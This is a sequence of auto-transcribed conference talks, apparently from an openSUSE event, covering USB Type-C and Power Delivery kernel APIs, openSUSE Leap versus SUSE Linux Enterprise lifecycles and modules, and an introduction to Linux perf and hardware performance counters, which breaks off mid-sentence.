USB because the hubs do it. So we are facing the ugly choice here of implementing it more or less with two APIs that is implementing it in the root app as an emulation like we do for root apps in USB in general, or to do something else. So any input here is appreciated. But I must say we are even now discussing the final touches of the alternate mode API. So power delivery API will have to wait. It also imposes on us a policy problem. There are several ways to get more power for our system. We can obviously request more from our power source if that is power delivery. We can tell devices to use less power. Or if there's a peak load, we can even wait and hope that the second peak load won't be necessary until the first peak load goes away. And if that's not the case, wait for it to pass. So this needs to be implemented. I talked in the beginning about accessories and we've decided to leave this to Alsa. I see a head shaking there. Could have thought so. Anyway, there is also a debug accessory, which is quite ill-defined. No idea. These are basically clutches invented for the company whose name I don't use here, so they can make very cheap headphones for their phones. It's part of the standard. So our API. What do we have? Nothing. In the sense that of what is in the kernel. Then there is a really big nothing. We have an API draft, which is almost finished and could go into 4.8, which is an API for the alternate modes, the mode switching and so on. That is working. For now, it looks like we are going with this split of the APIs. If somebody wants something else, he should speak up this week or it's too late more or less. We have not yet decided how we do the other way around. That is not tell the kernel to do things, but to be notified from the kernel about what's happening. What's happening on the bus is errors and the bus has a virtual, in principle, even vector interrupt capability. In that case, we've not even decided whether we should export this to user space. The current thinking is no, we should not. The same thing goes about resets. We do have a lot of things which are more or less decided. The whole thing is to be built in CISFS. If we can avoid it, there won't be an alternate modes tool or a USB PD tool. If at all possible, we are going to leave this in user space and if we are going to write such a tool, it's strictly for convenience, not really necessary. We're going to export this as directories purport with a lot of subdirectories which will list the available modes, the attributes, and so on, and the power delivery attributes. We've also decided, and this is a bit problematic in the graphics case, that an alternate mode will, in every case, need a kernel driver which is responsible for power management, error handling, and hot plug. That means that we have to find a way to get at least hot plug events for monitors from this driver into the graphics drivers. That much is clear. What is also not set in stone is the problem with the booting. We as a distribution probably want to be a master, but that's not something we can put into the generic kernel. At the same time, USB ports have to be enumerated before we load the INIT RD, at least in potential. This is possible. You can statically compile the USB core module, and that's a feature that's going to stay. We need to express to the kernel at that stage what do we prefer? Do we want to be a master if we can't do? Or do we insist on being a master and reject the other side if it also insists on being a master? These are possibilities which we need to express, and this probably means we are going to introduce module parameters, which is not nice, but I see no other option. We are also missing a good deal of stuff in user space. The obvious thing is GUIs. There is the possibility that we want to deviate from the default in the data role or in the alternate mode. That needs a user interface. We as a distro, how am I in time? We will be faced with the fact that we will end up as a slave in some places, because people will insist on linking their laptops with type C cables, and then somebody has to be the slave. We need to do something sensible in that case. That's not yet decided, but not a question for upstream rather than for the distros. In the alternate modes, devices are more or less called for, actually required, but we've seen requirements, to implement a small rudimentary USB 2.0 device which is capable of telling the host what it wants to be in terms of alternate mode. We need to implement a driver for this. Until recently, we wanted to have this handled by Udev and the GUI. Considerations about the boot process put this into doubt. We might actually need a kernel driver for this. Obviously, we need still in addition Udev rules. The problem here is again graphics. I will come to that. We have to come to the fact that we will sometimes end up as not the power provider, but the power sink. Then we might be asked to give back power or to renegotiate our power contract. We need some user space component for this. This is asking too much of our kernel. In addition, we need a power budgeting mechanism. We can decide to not over commit, but I doubt in the long run this is viable. We need first something in the kernel which implements this, and then something in user space which decides the policy for this. Even worse, if we, for example, are to give back power, we need a way to switch off charging the battery. We need power limiters and budgeters from other parts in the kernel integrated in this power budgeting. Demon thingy, controller, however we call it. There is something worse. We are talking about Thunderbolt here and PCI. USB 2, in the case of the storage thing, are parts of the block layer. Now, I know many people here would like to see power limiting only be done in user space. The problem with this is it is, in principle, impossible. This is not even a question of system design. It is a feature of using virtual memory. You cannot do this. You will inevitably deadlock because time is short. Is here anybody who insists on a full explanation of why this is impossible? Okay. So the actual implementation will have to look something like this. And we need furthermore to come up with a sensible boot process because there is a problem. If this play port really dies as a connector, we may end up with a systems who need the type C to work during the boot process to see something. And that is a problem we haven't even started thinking about properly. So we are short in time. Any more questions? Let's somebody hand this microphone. Okay. It is supposed to be designed as durable. This is my only device. I'm not going to do a torture test on this. More questions? So are you overwhelmed, disgusted? Combination of this? Surprised? Hungry? I'm rather surprised. Either I was totally incomprehensible or... Okay. Who invented this back? Was it the ACPI guys? I guess it was a kind of conspiracy between Apple, Microsoft, Google and Intel. But if Apple was involved, why didn't they use the lightning connector which is not half as broken as this one? I guess because the other side was also involved. Any more? No? Then the case is closed now.
The talk is intended to give an overview about the technology used for the type C connector and USB 3.1. I will cover USB role switching, selection of alternate modes and USB Power Delivery. An overview over the driver support is given. APIs are introduced and explained. The conceptual difficulties of USB Power Delivery are shown. The missing infrastructure in the kernel and user space is identified. The frame work of a solution is discussed.
10.5446/54612 (DOI)
I hope you had a good lunch. If not, there's something left. Grab it. So my name is Stefan Wielert. I'm working for SUSE as a project manager on the enterprise side. And I want to talk to you and with you a little bit about Open SUSE and the enterprise part of the company. So we have a big team of project managers working on these enterprise products. So if you have questions, don't hesitate to ask. I may not be able to answer all of them, but I try. I will talk a little bit about Open SUSE and the enterprise university, the university and the similarities and differences you have there. And in the end, it stands your spotlight, but it will be a little bit more or a little bit less, depending on how you see it. As you can see, I saw this picture recently in one of our offices. All of these three are gikos, but they are a little bit different. They are not the same. They have a little bit of different coloring, a little bit of a different form, but all of them have four feet and a head and a tail. So they are similarities as well as differences. What you see here is a rough overview of how it looks like currently in the universe. You see here, tumbleweed with its more than 8,000 packages. I'm not sure what the current count is. Please don't name me down on numbers. The rolling release, you see here, Leap with the core it gets from the SUSE Lino enterprise, 6,000 packages, you may be surprised that there's no number here. The reason is simply that it's not so easy to count it. I tried it before that talk and it's roughly 2,000 source packages and between 3,000 and 4,000 binary packages. The reason why it's not so easy to count is that the enterprise product is not one product. So what you see here, we have the server side, we have extensions, we have a kind of virtual products with the support side, virtualization, the cloud product, products that are for managing the server, last but not least the desktop products. And all of these are based on the same code base, but have a different selection of packages, have sometimes additional packages, sometimes the same packages. For example, if you look here, the server products, of course, have the same kernel, but the server products don't have, for example, the open office or the Libre office packages that the desktop has. So all of this makes up the enterprise portfolio and on top of that, and it's not in that picture because I had no idea how to bring it in, we have also something separate which I will talk to you later. So whenever I talk about Sli, that means that whole code base. It's not just one product, but it might be different per product. And you see here, or you have seen that slide also, when Lutwick talked yesterday, the Libre product is built on the core and on Libre packages as well as Sli and the core. All of that gets feed, opens to the tumbleweed. So whatever is done here, and sooner or later here. Of course not for all packages because 8,000 packages, you remember, 4,000 packages roughly here, so not everything ends up there. So you may ask what are the main differences now between the enterprise and what we do in the open SUSE side. Oh, by the way, if I say open SUSE, it mostly includes all of that. I'm an enterprise guy, I'm a little bit slopey on that. I'm accustomed to say Sli when we mean all of the code base. So if I say open SUSE, it means that part of the picture and it's not mentioned for one of those specifically. Be with me here. I'm an enterprise guy. On the differences, I've listed here some which I will talk to you in the next few minutes. There too I will not go into detail. The first two we will come to later. Partitioning and installation workflow, it's quite different between the open SUSE products and the enterprise stuff. We have different workflows there, different kinds of installation. The partitioning is done quite differently, mostly to fit the needs of the enterprise customers, especially the server guys. When it comes to platforms, yeah, frankly speaking, that these two lines are correct and they are wrong at the same time because open SUSE, you have Leap, you have Tumbleweed, you have the ports and the stuff that is produced and on the enterprise side, you have several products and not all products are available for everything. You may wonder why I have here AR64 in brackets. The reason is very simple. With Sli 12, we start to produce AR64 images that are supported, but we are only doing so for selected hardware. You may be aware that the AR64 platform is not one, but very specific and there are small but significant differences between the various products the vendors put out there. So with the SP2 now, we will add that. We have no, as you can see, 32-bit support here any longer with Sli 12, we added with Sli 11, but we dropped it on the code 12 side and that's also a slight difference. So let's look a little bit at the lifecycle. Open SUSE Leap. Yeah. We have the core releases, you know it, we use the core sources from the enterprise. The advantage there, clear stability. It's well tested. We have our J looking at that stuff very closely in the course of developing the Sli products. You see here, the major Leap releases are supported for at least 36 months. The minor releases, yeah, it's mentioned here to be released annually. We follow here on the Leap side this Sli release cycle. On the other side, while this may look complicated, it even gets more complicated if you come to the enterprise side where it's relatively easy. When we talk about a code stream, we are talking about 10 plus years of support. So that means whatever we bring out as code 12, SP0, it will not die before that time has ended. We are currently with code 12 bringing out annually service packs. Currently we are here. We are working on SP2. You see, if you count now down, you will see when we had released Sli 12 and we are still supporting it. Of course, 10 years general support, that means we are actively producing a lot of maintenance updates, fixes, supporting it. And then there's three year of extended support as well as LTSS where I should mention that for LTSS you have to pay additional fees and then you get prolonged lifetime. So you could even nowadays, if you look at the top line with SP2 out, we would normally not support you if you are running on the GA version. But if you bought LTSS, you would still be supported until way after SP2 is out and SP3 has been developed, which adds of course a certain amount of burden to us and our developers. Just to give you an impression, think about Firefox 10 years ago, how it looked like and how the code was. Take the project you are working on or using most all day. 10 years ago, long time, think of you have to fix a bug there. Now immediately, in a day. So you can imagine that makes it very hard and adds quite a lot of burden. And that's why we have very strict rules and why we are very selective on what packages we add. You don't want to have a package there where you have constant bug fixes, root exploiter, anything else. You don't want anything there that's unstable and causes your system to crash. Remember what we have seen? There are a lot of service packs, but not all of these service packs are equal. So with code 12, we have switched a little bit from what we had in code 11. We have now two types of service packs. We call them refresh releases and consolidation releases. Why do we do this? Look at this, you see every year a new service pack. Imagine you have tens of thousands of servers and we ask you every year to update all of them. You can imagine what the answer of that would be. I personally don't want to do that. But on the other side, there are things where you need new stuff, where you need a new kernel for hardware support, for anything else. So we split it up in refresh releases and consolidation releases, where the refresh releases are the big service packs. That means we do, for example, a kernel major version update, upgrade the X, upgrade several versions of critical components. I mentioned your system because it's always a little bit of pain for there. You heard yesterday about the GNOME update from Frederick, so you should be aware currently SP2 is one of these refresh releases. We have the consolidation releases where we try to stabilize what we have, to fix all the bugs that are open, and to make the system overall fit to stay in that amount or in that degree to a long time. Currently, the SP1 that is out is one of these consolidation releases where we have stabilized and put the emphasize on bug fixing. But of course, we are engineers, so a few features always wander in that refresh release and the consolidation releases. So it's not so strict. And be aware, the bug fix for one customer is a feature for the next customer and the other way around. Sometimes it's not quite clear, is it now a bug fix or is it a new feature? So yeah, we solve this by saying we allow a certain amount of new features there. Package selections. I talked about that already a little bit. Customers have a very simple view of the world. They want everything the same except of that things that matters to them and that they want refreshed. But everything else should stay the same. They want fewer bugs, at least if possible, non or in things they don't use. They want stable interfaces because the application that they have should go and work. They want to know when a fix is available if they have stumbled over something. They hate regressions. So if we do a service pack update and something is no longer working afterwards, catastrophe. Yeah, they want a huge number of applications that we should support, best everything that they use, even if we have no control about it, even if it's proprietary software. And there they want to, a lot of these customers are very conservative. So updates or changes, not good, except for that one application that they need. On the other side, they want us also to be very fast. To support the latest hardware that's out there, best before it's available. They want us to be innovative. So the latest and greatest stuff being there. But it should be stable. They have feature requests that go in every direction. Different form factors. Remember when we had that change from the desktops to the tablets to the smartphones, there's newer requests coming in day by day. And think about also about the virtualization, which is for a lot of these customers just a kind of form factor. Yeah, and stay current the last thing they want the latest and greatest. Now you remember we had that long support lifetime. That is a little bit of a problem here, because always updating, producing the latest and greatest and keeping the same old stuff at the same time is difficult. So we looked about that and our solution to that was that we came up with the concept of modules. You will now say modules, I haven't read that on the product overview at the beginning. That's correct because these modules are components of the server product. So if you buy a server product and you register it, you get these components for free on top of it. They are fully supported. They are only delivered online, so you can't get an ISO image or download somewhere. They have a flexible life cycle. You will see later in one of the slides what that means. But in the end, it means we can put their stuff that changes very rapidly. Think about some scripting languages. Think about packages where we want the customers to be able to move to newer ones. For example, old send mail or old Java versions. If you have still the need for an old Java version and cannot go to the latest and greatest there, this is our way of providing it. Where we say you have a certain amount of time, varies a little bit from module to module, and then you should have migrated your applications to the newer version and test it if it works or not. You may ask what is a module? A module is nothing more than a collection of software packages. Simply put, it's a repository that you simply add. I think tomorrow or the day after that, you will hear from one of the colleagues about what he thinks about adding more and more repositories. But we try to make it very easy for the customers to get these packages. The most easiest way is adding a repository and make it very transparent so that you can handle it in your package manager like the rest of us. Once it's enabled, you won't see a difference there if it comes from this or that repository. The modules are set up that they are independent of each other. You can decide to use one and ignore the rest or you can add all of them. However, you do it, it doesn't matter. It's currently only available for the Susie Linux Enterprise. We are discussing adding some of those to other of the base products, but at the time being we have from our customer requests only a need here on the server side. Important, the last part here, the different life cycle of the core product. So that's important for us as well as our customers. On the implementation side, it's very transparent. Either you edit during the installation of the product or you can do it later in an install system either through YAST or to Susie Connect. It's only available online. I already said this. It's not a pattern and it's not a product. So you can't buy that. You just get it for free. I fear a small list of the available modules and I admit that one is missing. So you see here we have, for example, right at the top, the advanced systems management module, which contains, for example, the CF Engine, Puppet, the machinery tool and we are currently discussing of adding salt here. So this is for those that need these types of relatively fast changing systems. Frankly speaking, I would not like to have a Puppet or a CF Engine in the main core media where we have certain years of support where we need to be very careful of what we add and how often we upgrade. Therefore we have put it outside in a module. The container module where we have all Docker and additional stuff that includes, for example, also images that are prepared for the Docker side. And the good thing is if you download the base system, this last site, and you don't need anything of that, you don't have to download it. So it's just on demand if you need it and that's very important for a lot of our customers. The legacy module you see here, old Zen, mail, Java, stack, things like that. And important here, we have a different life cycle for each of these. So we have a kind of continuous integration here for the first two you see where we expect a lot of fast coming changes and we want our customers to be able to get that. But on the other side, the legacy module where we have the old side, you don't want to have or you don't expect here to have updates every month. You expect them if there's a serious security issue, but beside of that, this will be supported for three years, which gives the customers enough time to migrate to the newer stuff. And here also the tool chain module, if you have always wondered why has the server, the old GCC48, well, it's easy. We want the backward compatibility. We don't want to have any breakages there. But on the runtime side, we are able to run stuff that has been compiled with GCC5 or soon GCC6. The tool chain module has the compiler. For GCC5 currently, it will have later this year the GCC6 compiler, but the runtime will be delivered also for the base products. A short overview of how this all fits together. I've left out a few things. So the solid driver program is for partners providing driver updates, drivers for specific hardware. We have SLS and the products here with the modules. We have the SDK and we have the package hub. I will not say anything about that because Scott will have a presentation, I think, tomorrow, right, Scott? I recommend that, really, it's our solution to add things to the enterprise universe that we cannot provide at the moment with the current structure. So if you look at the differences we have between the enterprise universe and the open SUSE. For one thing, it's, of course, the stability and the enterprise hardening. Our enterprise customers ask for a lot of testing. I have a lot of complicated scenarios that most of the home users will never ever see. Complex scenarios, be it from the network side up to stacked virtualization machines and other things. So we do hear a lot of testing also together with our partners. So if you buy an IBM machine, IBM has tested the stuff there, the drivers are tested, everything is hopefully in a very good state and that's something that's very important for the customers outside. Certifications, don't nail me on the 6,000 commercial packages here, it might be more or less. It depends a little bit on the code stream. So for code 11, it's more, for code 12, it should be around that. We have certifications that are hardware specific as well as certifications that are specific to software like the FIPS certification that's important on government side or other things which are hardware specific then. In demnification, you know it, sometimes people threaten to sue the open source world with various lawsuits. We protect our customers here and that's something we only offer for the enterprise products. And very important also, the guaranteed response time for L3 box. So if one of our customers comes and says, oh, my system that serves 10,000 services down, can you help me? We have a bug here. We do so and we do it in a timely manner and very fast. The default configuration in the runtime is also different between open source and SLEE, but that's I think a natural thing. But there are also things where we don't differ so much. So we're using the same tools to produce the stuff. We use the build service, we use OpenQA, we use Baxilla. The first two, we just have different instances. So there's the open build service and there's an internal build service which is simply due to the fact that we have different platforms as well as that we need a certain amount of response time when building so we have reserved machines there. OpenQA, of course, two different instances because we have completely different sets of hardware, different sets of test cases that we run, but we profit on both sides for that because tests that are able to run on both are run on both. And of course, we try to use the findings that we find on the open source side as well on the SLEE side and the other way around. Of course we forgot about it, but it's very important that OpenSUSE is the base of the enterprise products. So everything you do in tumbleweed sooner or later ends up in an enterprise product, give or take the package selection. So OpenSUSE and its products are upstream for us, which is good. Sometimes we suffer then from the same problems that everybody suffers with upstream, but then we are based on the same code base. And if we go further than OpenSUSE and the same upstream products, we have a lot of things in common and that's very, very good. We are diverting later a little bit because you have seen with that long lifetime, that means also we are very reluctant of going with the latest and greatest version. I had it this morning, a discussion about version and upgrades of version. We have to be very careful if we do a version upgrade. Simply because we want the stability, we want no regressions, and customers get very nervous if they see a big change on the version numbers. That doesn't mean we don't do it, but we are careful. And very important, every package submit we do on this Lee code base is going through a review just like it's done on OpenSUSE. But we have the requirement that everything you submit there also goes into the respective devil project or factory project outside on the OBS. That means if a developer gets a bug for less 12 SP1, fixes it, submits it, we have, we look at it, we check if the same fix is already in upstream, which for us is OpenSUSE. And check is in the devil project or maybe already in one of the products. If it is, everything is fine, we accept it, case closed. If it's not, it gets complicated. There are fixes that doesn't make sense to have it outside, either because they are very platform specific, very Lee specific, think of a fix for a configuration there. There are fixes where we say we have diverted so much that we need to look carefully, is it sensible to add it to OpenSUSE or don't they suffer from it? Because they are already 15 version further ahead in that package and will never suffer from it. And there are a few things where we have diverted in the past so much that we are still struggling to get it re-merged together with what we have here on the OpenSUSE side. In an ideal world, everything that we get submitted to Lee will also end up in OpenSUSE. We are not there yet, but we are very close to it. So we are doing a good job, in my opinion, of making sure for that. The biggest problem we currently see here is we just check that there is a submission to the devil project, but we cannot, of course, make sure that it ends up then in the factory project. The devil project of the respective package in case you are wondering. We are also facing the same problems. In OpenSUSE, if you are a package maintainer, the upstream project, if you are not it yourself, sometimes makes decisions that you don't like. Let's say it in that way. And we are facing on this Lee side that even more, because if there is a decision done for Tumbleweed, of what direction to go, of where to spend time with development, it could be something, let's take as an example the desktop we had yesterday, what will be the default desktop, which will be concentrated, if you would decide now we drop GNOME completely from Tumbleweed, it would be a little bit of problematic for us. I don't think you do that. That's why I used that example. We all know that it can be tricky to influence upstream. Of course, the enterprise guys want to influence also the OpenSUSE guys to go a little bit in one direction or the other where we think it's useful to do so. And you know how it is with communities, the opinions there are widespread. So if we say we would like to see this, that doesn't mean that everybody sees it that way, not even inside of the enterprise community. So we are struggling there and we have the same problems in both worlds with the fact that we are all humans. And when I looked at it, then I came up with a sort of things or points where I'm not sure if we are similar or if we are different because on a certain degree we are different, but on the other side, we are not so different. Package reviews, submit reviews, I mentioned it earlier. They are done for OpenSUSE. They are done for the sleep products. Mostly the same rules apply. So if you wonder what are the rules on the enterprise side to get a fix submitted, look at the OpenSUSE rules, most of them are identical. We have a few ones where we are more strict and where we are more relaxed, but in the end they are nearly similar. One of the things we, for example, ask for is bug numbers, but there are cases where we also say no, we don't need them. It's okay in that way because it's just a build fix or something like that. On the packages that get submitted, for example, if you rebase your packages, you don't need to mention all the packages, the packages there and the package that you have rebased. It's enough if you say we did it. If you do a big version update, we are fine with having said, we have a new version update, we drop all the packages. We accept that. And of course the interpretation of all these rules is a little bit different between OpenSUSE reviewers and sleep reviewers. I admit here that it's also different by the sleep reviewers' insights, so depending on who does it, it might be that one thing is okay and the other not. But we try to be very much on the same level there, at least inside of the much smaller sleep review group that we have compared to OpenSUSE. The configuration options, it's natural. It doesn't mean the change for the building time. You will say, of course they do, but sometimes developers forget about that. For example, OpenSUSE, Wayland, do we have it on or off? Who would know that? Currently, it's on, as far as I know. On the sleep side, we have disabled it, which gives you on some builds completely different problems than you have never seen before, and that makes it also different and sometimes hard for us to work. And of course the S390X platform, I mention it because I have colleagues who are driving very much the project to get this also on the OBS working. It will come sooner or later. We would like to see it. We see their problems and things that are good that we would like to give you to the outside too. But I'm pretty sure most of you that are here don't have an S390X at home. A short outlook, and it will be really short because otherwise I will run out of time. You see here the timeline. Ludwig talked yesterday about where he is with Leap. We have released on the sleep side for SP2, beta 3 last week, and in one and a half weeks we will release beta 4. So we are currently going towards the RC phase where we are very strict with what we apply and what we do. I already mentioned it, SP2 is a refresh release, so that means we have a kernel version upgrade, we have a system de-upgrade, hardware, ISV certifications should stay stable. A little bit on the details, you have seen it most likely on the Leap releases already. We use on the currently kernel 4.4, heavily patched with stuff from 4.5, 4.6, and sometimes even beyond. We will support NVDIM as a tech preview, Intel Omnipass, we have Xen 4.7 included. SP2 will be the first one with TPM 2.0 support, which is very much in demand by our customers, but has still quite some culprits on the upstream side. System D288, I mentioned this because it caused quite some discussion recently. We are using Wicked in the enterprise products, we are not using system D network D. Please let us not discuss why we do it or that. We simply said we cannot support system D network D in a way that we currently would need and we think that Wicked is the better solution currently for our enterprise customers. Software defined anything is currently the big buzzword and we are preparing our system here for software defined networking. We have added the data plane development kit as well as integration of that into the Open vSwitch package. This is something where a lot of the telecoms are looking forward to and we plan to invest here more with future service packs. I mentioned it on the ARM side. AR64 for selected hardware will be first time supported with SP2. Frederick mentioned yesterday, GNOME 3.20. We have also updated quite a lot of fonts which you hopefully will not see, but in some cases might. So your monitor is not broken there, but it's a different font. And one thing that is important for our customers, we have now support for skipping a service pack. So if you want to go from a consolidation service pack to a consolidation service pack, you can do it and skip the refresh. Or if you want only the refresh ones, you can do that also. In former times you had to go through all of the service packs. That means if you were still on service pack zero, you had to go to one, to two, to three, to four. Now you can skip, which sounds more easier than in reality it is. If you consider how much packages and configuration change, if you think about package splits, if you think about package merges and the requirements there. And we had on the enterprise site always beta programs running. These were very close beta for selected partners, customers, you had to apply for it. With SP2, we decided to be much more open to make an experiment and open up the public beta. That means everybody who is sitting here can join the public beta program. If you are interested in that, go to the Susiecom web page on look for the beta program. You need to fill out a little bit of stuff, but otherwise you can join it and there is no restriction there. It's a big step forward for us because the infrastructure to support all of those people that will join is significant and we want also your bug reports that are coming in to not go down in a big pile of bug reports but to process them and currently we are coping with that. I would be happy if we are no longer being able to that because all of you join and have so many bug reports and fixes. So please join. Looking a little bit beyond what we currently had, you remember that picture here? There's one part missing and that's at the end of the leap when it comes to the next code stream. I think there are some parts where we are still lacking in our cooperation between the enterprise and the open Susie part. So we are currently doing a batch of getting patches that go to factory into the enterprise universe. There is currently no way that the reviewer in the open Susie world can see if that patch has been submitted to the enterprise if it's relevant there or to make note on that to the enterprise developers. I don't have an answer for that to be honest. I don't know how to solve it. If one of you have a good, genial idea, speak up. I would like to hear ideas here. Speed ups. I'm not sure how much it's true but one complaint we often hear as project managers is that the time until a patch or submission gets reviewed on the open Susie side is too long. On the other side we are also seeing a big cue on the legal review side that we have under control and we need to see what we can do to speed that up. We have a very pushy, less release manager who always dreams of having a patch being submitted and one hour later he has a completely tested new image out of the system available and I can tell you that's not working and we tell that to him every day. The fastest we are currently on the open on this lease side is four hours. It takes four hours until a patch has been submitted, pretested for submission, everything built, fallen out and retested and that's the fastest we can get currently which is very improvable. Dependencies. If you are looking forward for the next code stream, code 13 and others, have you ever looked at our built requires and our requires in the packages? If you are a package maintainer please have a look at that. We need to clean that up. We need to reduce the complexity here. The complexity currently is really, really big. We had it recently. I think it was XRDP package that got submitted and it triggers LibreOffice. I mean that's a natural connection, right? You have an XRDP and you build an Office Suite. It's simply because the built requires are relatively lax there and they require that. If it's submitted, build LibreOffice new. It doesn't make any difference but please do it. We have hundreds of these connections inside. That makes it hard for OpenSUSE to build in a fast way. That blocks the build service and it makes it very hard for us on the enterprise side where we have or we try to reduce the number of packages that we have and we want in the next few months to reduce that a little bit. The enterprise guys will look at that and you will see patches coming also to OpenSUSE. Let's say, hey, drop this, build requires or drop this requires because it's no longer needed. We find with every release we do leftovers from ancient times where we still have requires or build requires that are no longer needed. Many of these that we remove helps us tremendously and going either further, do we really need a requirement on some place to build the 750 plug-in for a program? Is anybody using that or is it just that we added because it's there? I would like to see us thinking about that a little bit. If you're a package maintainer, do you really need all the plug-ins that you have enabled? Is it really needed that we add all of those? Because with every dependency we add, the complexity goes up quite tremendously. And last but not least, join us. We have open jobs. There's a lot of jobs open for everybody and we would like to see you if you're not already a Suzy employee to join us and to strengthen our team. With that, I would now be open for questions and discussions because I think we cannot just live each on our own. The open Suzy world here, the Slee world here, but it's an interaction and with Leap we have come closer together, but there's still quite a lot of things that we can do to improve. So that's it from our side. All their questions. How often do we get major releases? There isn't anything about that. You mean on the enterprise side? Both. On the enterprise side, and I'm being careful here so that no product manager will kill me afterwards. It's roughly currently three and a half years between the major releases that we target for. We had more time between code 11 and 12, but for code 13 we are currently thinking about that timeframe. So for the Leap releases that would mean also that 43 would then be most likely three and a half roughly years after that. But that's just an inofficial number because we have not agreed on that yet. The project managers are discussing this with the product managers currently how to do it best on the schedule because that's always a little bit tricky, but three and a half is roundabouted. Other questions? If not, then thank you everybody. As mentioned, we have jobs and look out for our beta program. Our beta program manager is happy to add everybody who wants. So feel free to apply there. Thank you very much. Thank you. Thank you. Thank you.
Leap and the SUSE Linux Enterprise products share a lot of things in common. At the same time, they vary in a lot of aspects. Some of them are caused by fundamental differences in the philosophy and the basic properties of the projects. With the upcoming SP2 of CODE 12 of SUSE Linux Enterprise it's time to look at those differences and similarities, as the codebases will be getting closer again.
10.5446/54614 (DOI)
Okay. My name is Tony Jones and I am a senior software engineer in the performance group at SUSE Labs. Our primary responsibility is basically the kernel side, finding kernel bugs, detecting kernel performance bugs, fixing kernel performance bugs, working on the tooling to help us find kernel performance problems. I am based in Portnorgun, which is the true home of real beer. So come and visit. Yep. Anyway, there's my email there. So if you have any questions about the talk or whatever, just find me an email. So can I take this? So the first thing to bear in mind is that performance analysis is not easy. So if you find yourself having to do it, go easy on yourself. It's extremely subjective. Lots of different, two different people can have two different opinions regarding what is fast, what is slow. If you have a performance problem, generally regressions are the easiest thing to do. You can run the performance monitoring tools. You can, in conjunction with the bisection, you can just go and find the problem and fix the code. But if you have to take it from the other direction, which is that it's brand new code you've never seen before, it's code that's worked before fine, but now you're running on new hardware, it can be a challenge. In that case, there's a whole bunch of what are called performance analysis methodologies. Basically, we're talking about a procedure, something to keep you on the right track, stop you from running around in the weeds. Lots of different methodologies, different degrees of formality. So it's kind of a topic outside of this talk, but you can go Google and look for them. Bottom line, be methodical. If you have to do infrequent analysis, what I recommend is what I call the bugzilla methodology, which is basically go and do the steps that we would expect from you if you were filing a bug with SUSE. So try and quantify the problem at the top level. Whole system feels sluggish, particular component feels sluggish. Just try and break it down. If you can't quantify it, then you have to ask yourself, well, why do I think there's a performance problem? Is it new or has it always been there? Obviously, you only make one config change at a time on the system. So what's changed recently on the system? Does it occur on particular hardware and so on? You don't have to know every single command line option, but it's very useful to know what tools exist. Also, the documentation can be thin to non-existent. It can be wrong. So don't be scared to write code. If you think the performance tools are saying, okay, in this situation, we'll do this, and in this situation, we'll report this. Don't be scared to dig in, write yourself some code, test out your hypothesis, tweak the code, keep on going like that so you can say, oh, when I write my code to estimate cache misses, then the performance tools tell me this information. That's pretty useful just to practice before you ever have to actually dig in. If you do dig in, you can always do the blame on the group methodology, which is really good. So there are lots of tools. Perf is only one, and it is not the first one you're going to want to use. If you think you have some kind of performance issue on your system, the number one place to stop is Dmessage, syslog. Look and see if you have any particular unusual entries in your logging. After that, the standard top utility, get an idea if it's CPU bound, if it's user space, kernel space. If it's not CPU bound, then dig into the IOS stat, VM stat type tools, get an idea about what the virtual memory in IO behavior is, and then finally, Strace using the Ptrace API is extremely useful tool for getting an idea about system call behavior and system call latencies. So we'll talk a little bit about performance counters. In the old days, you tend to use tools like Prof, which were real basic profilers, bucket-based software profilers. These days, if you want to do something like that, you better off using Valgrind. Basically, it's a hardware resource to aid in performance analysis. It's been available on the X86 since Pentium 3. Availability is through the CPU ID instruction and the MSR as the model specific registers. You'll see this term arc-perfmon used a lot. It basically stands for architectural performance, which basically means that Intel has agreed that this will be available in future architectures, and that provides about seven or eight counters. By standardized, because the microarchitectures are different, it means that it exists, but it doesn't necessarily mean that it'll be implemented in exactly the same way. And beyond this, each separate microarchitecture, so that's in the Halerm, Broadwell, Haswell, et cetera, implements a whole slew of microarchitecture-specific counters. Each microarchitecture has different numbers of performance counters and so on. So taking a step back, so perfmon 2.0 was the first in-tree subsystem that used performance monitoring hardware, and that was designed by HP for Itanium. And it's still in the kernel tree as of today for Itanium. And it was extended for other architectures, specifically X86-64 in 2008. And the interesting thing about perfmon was that nearly all of the logic was pushed into the libraries. So there was a library called libpfm and a tool called PFmon, and the actual kernel side was very small. And that got submitted to LKML in 2008. And this fact has been a lot of controversy over the years about tools that live out of tree. And also perfmon exposed most of the counter complexity to the users under the theory that it was complex anyway, so don't try and hide it. And there was a counter proposal that came out almost afterwards, which was called Performance Counters for Linux, which was a single syscall-based interface with nearly all the complexity pushed into the kernel, and the tool was not out of tree. The tool lived in tools perf. And so that got merged into the kernel 2009, Performance Counters for Linux, kernel version 22631. And it's now known by the almost un-googleable term perf events. And it is a Swiss Army knife of functionality, but mostly it's focused on CPU usage tracing, but it can also be a benchmarking tool. You can also use it for statistical analysis. So we're going to talk mostly about perf now. So curious, how many people here have actually used perf? Okay, how many would you think? How many would you think are reasonably expert in this? Okay, that's good. So where to begin? First thing, install it. We package it as an RPM for open SUSE, tumbleweed, you know, leap, sledge releases. And like similar tools like a zipper and get it exposes a hierarchical command interface. So first thing you're going to do is type in perf help, and that will list you all the different sub commands. And there are many of them. But these ones here are the most likely ones that you're going to typically encounter. Perf top is pretty much like the Unix top utility. List will list you the events. Perf is a sampling interface. Report is a reporting tool. Annotate will give you source code. Annotation. Trace is the trace point interface. And there's one more that I forgot, which I shouldn't have is perf stat, which we'll talk about a lot. So the first thing that you're going to do is run perf list. And this is going to produce a lot of output. And I've pretty much sliced it away here with these ellipses. But you'll see what's happening here is the perf is aggregating many different event sources into this event list. So you have hardware events here. You have software events, hardware cache events, raw events, and trace point events. The hardware events are the events exposed by the performance monitoring hardware, the same as the hardware cache events. The software events are pseudo events that are being exposed by the kernel. So in this case, context switches. The raw events are a way of specifying the raw hex code to access the low level performance counter events. And trace point events are a way for the existing F trace infrastructure to be exposed into perf. So obviously, most people probably are familiar with F trace. It's a static static trace point feature in the kernel where particular points of interest have been marked. And then it's a low cost tracing if enabled to basically dump data to a ring buffer. So one thing we notice here is we see under the hardware events, we've got cache misses, CPU cycles or cycles and instructions. These are what is termed an event moniker. So that's basically an alias for an event. You won't find these in any Intel documentation whatsoever. They're basically, this gets to the issue of perfmon and perf and they wanted to basically abstract the event names so it was easy for users to use so I didn't have to know what the hell was my event type. So on this machine I'm running, which is a Z on E5. If I look in SysDevices CPU events, I will find a file called CPU cycles which matches that event moniker. And if I cap that, I will get the value 0x3c. Now I mentioned that a libpfm still exists. That was the library from perfmon and it got repurposed into a kind of higher level wrapper over perf to help you decode events. And so the command user bin show event info comes from a libpfm develop package. So if you install that, if we run it, it dumps all of our events out to a file. And if I 